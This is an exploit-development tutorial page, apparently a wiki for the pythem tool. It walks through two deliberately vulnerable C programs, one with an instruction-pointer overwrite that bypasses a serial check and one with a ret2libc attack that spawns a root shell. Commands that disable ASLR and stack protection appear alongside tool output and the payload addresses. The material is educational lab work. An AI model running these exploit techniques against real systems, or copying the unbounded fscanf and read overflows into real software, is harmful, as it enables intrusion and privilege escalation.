Exploit development
m4n3dw0lf edited this page Aug 16, 2016
# Exploit Development
## Exploit Development 1: Overwriting the Instruction Pointer
- Vulnerable Serial-Key C program.
//Code from "Shellcoder's Handbook: Discovering and Exploiting Security Holes"
//Disable Canaries, Compile: gcc serial.c -fno-stack-protector -o serial
//Disable ASLR, echo 0 > /proc/sys/kernel/randomize_va_space
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int valid_serial(char *psz){
    /* Returns 1 when psz is an acceptable serial, 0 otherwise.
     * A serial must be at least 10 characters long, every character must fall
     * in the range '0'..'z' (inclusive, compared as plain char), and the sum
     * of the character values must leave remainder 83 when divided by 853. */
    size_t len = strlen(psz);
    if (len < 10) {
        return 0;
    }
    unsigned sum = 0;
    for (const char *p = psz; *p != '\0'; p++) {
        char c = *p;
        /* Reject anything outside the accepted character window. */
        if (c < '0' || c > 'z') {
            return 0;
        }
        sum += c;
    }
    return (sum % 853 == 83) ? 1 : 0;
}
int validate_serial(){
/* Reads one whitespace-delimited token from stdin into a fixed 24-byte stack
 * buffer and returns 1 when valid_serial() accepts it, 0 otherwise.
 * The "%s" conversion carries no width limit, so a token of 24 or more
 * characters writes past the end of serial[]; this is the overflow the page
 * demonstrates. A width ("%23s") or fgets(serial, sizeof serial, stdin)
 * would bound the copy. The return value of fscanf is not checked, so on EOF
 * or error serial[] is left uninitialized and valid_serial() then calls
 * strlen() on indeterminate bytes. */
char serial[24];
fscanf(stdin, "%s", serial);
if (valid_serial(serial))
return 1;
else
return 0;
}
int do_valid_stuff(){
    /* Report that the serial was accepted and terminate the process with
     * status 0. Never returns: exit() ends the program here. */
    fputs("The serial number is valid!\n", stdout);
    // do serial-restricted, valid stuff here.
    exit(0);
}
int do_invalid_stuff(){
    /* Report the rejected serial and terminate the process with status 1.
     * Never returns: exit() ends the program here. */
    fputs("Invalid serial number!\nExiting\n", stdout);
    exit(1);
}
int main(int argc, char *argv[] ){
    /* Entry point: accept or reject the serial read from stdin.
     * Both callees end the process with exit(), so the trailing return is
     * only reached if one of them ever returns. Arguments are unused. */
    (void)argc;
    (void)argv;
    int accepted = validate_serial();
    if (accepted) {
        do_valid_stuff();
    } else {
        do_invalid_stuff();
    }
    return 0;
}
- commands:
pythem> echo 0 > /proc/sys/kernel/randomize_va_space
pythem> gcc serial.c -fno-stack-protector -o serial
pythem> ./serial
123456
Invalid serial number!
Exiting
pythem> set file ./serial
pythem> xploit stdin
xploit> disas main
Dump of assembler code for function main:
...
callq 0x400723 <do_valid_stuff> (the function that only an authenticated user should be able to reach.)
...
xploit> fuzz
...
[*] Sending buffer with lenght: 39
[*] Child program exited with code 1
[*] Hit enter to continue.
[*] Sending buffer with lenght: 40
[*] Sending buffer with lenght: 41
[*] Child program crashed with SIGSEGV code: -11
^C
xploit> set arch x64
xploit> set offset
[+] Enter the offset (number of 'A's): 40
xploit> set addr1
[+] First address to overwrite: 0x400723
xploit> xploit
[+] Writing payload into buffer.txt
[*] Sending buffer with lenght: 58
The serial number is valid!
Exiting
## Exploit Development 2: Ret2libc
- Buffer-Overflow vulnerable C program.
// Disable Canaries, Compile: gcc -fno-stack-protector vuln.c -o vuln
// Disable ASLR, echo 0 > /proc/sys/kernel/randomize_va_space
#include <stdio.h>
#include <unistd.h>
int vuln() {
/* Reads up to 200 bytes from stdin into a 40-byte stack buffer and echoes
 * what was read. read() is handed 200 as the length, so any input longer
 * than 40 bytes overwrites the stack beyond buf[]; this is the overflow the
 * page demonstrates. The bound should be sizeof buf - 1 followed by an
 * explicit NUL terminator. read() never NUL-terminates, so "%s" may read
 * past the bytes actually received, and r can be -1 on error, which is
 * printed without a check. */
char buf[40];
int r;
r = read(0, buf, 200);
printf("\nRead %d bytes. buf is %s\n", r, buf);
return 0;
}
int main(int argc, char *argv[]) {
    /* Entry point: print the banner (no trailing newline, so it may not
     * appear until stdout is next flushed) and hand control to vuln().
     * Arguments are unused. */
    (void)argc;
    (void)argv;
    fputs("Try to sh", stdout);
    vuln();
    return 0;
}
- commands:
pythem> echo 0 > /proc/sys/kernel/randomize_va_space
pythem> gcc vuln.c -fno-stack-protector -o vuln
pythem> set file ./vuln
pythem> xploit stdin
xploit> set arch x64
xploit> fuzz
...
[*] Sending buffer with lenght: 48
...
[*] Child program exited with code: 0
[*] Hit enter to continue.
[*] Sending buffer with lenght: 49
...
[*] Child program crashed with SIGSEGV code: -11
...
[+] Sending buffer with lenght: 55
...
[+] Instruction Pointer may be near: 55
[*] Child program crashed with code: -7
...
[*] Sending buffer with lenght: 58
...
[*] Child program crashed with SIGSEGV code: -11
^C
The offset lies somewhere between 55 and 58.
xploit> set offset 56
xploit> search instructions
[+] Find: % rdi
...
[INFO] File: ./vuln
0x0000000000400613: pop rdi; ret;
xploit> set addr1
[+] First address to overwrite: 0x0000000000400613
xploit> find "/bin/sh"
...
Found 1 results, display max 1 items:
libc : 0x7ffff7b9c598 --> 0x68732f6e69622f ('/bin/sh')
xploit> set addr2
[+] Second address to overwrite: 0x7ffff7b9c598
xploit> p system
...
$1 = {<text variable, no debug info>} 0x7ffff7a76710 <__libc_system>
xploit> set shellcode
[+] Enter the shellcode: 0x7ffff7a76710
xploit> xploit
[+] Writing payload into buffer.txt
[*] Sending buffer with lenght: 98
...
[!] If it does not work automatically, run on terminal: (cat buffer.txt ; cat) | ./vuln
xploit> exit
pythem> exit
# (cat buffer.txt; cat) | ./vuln
Try to bash
Read 98 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAb
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root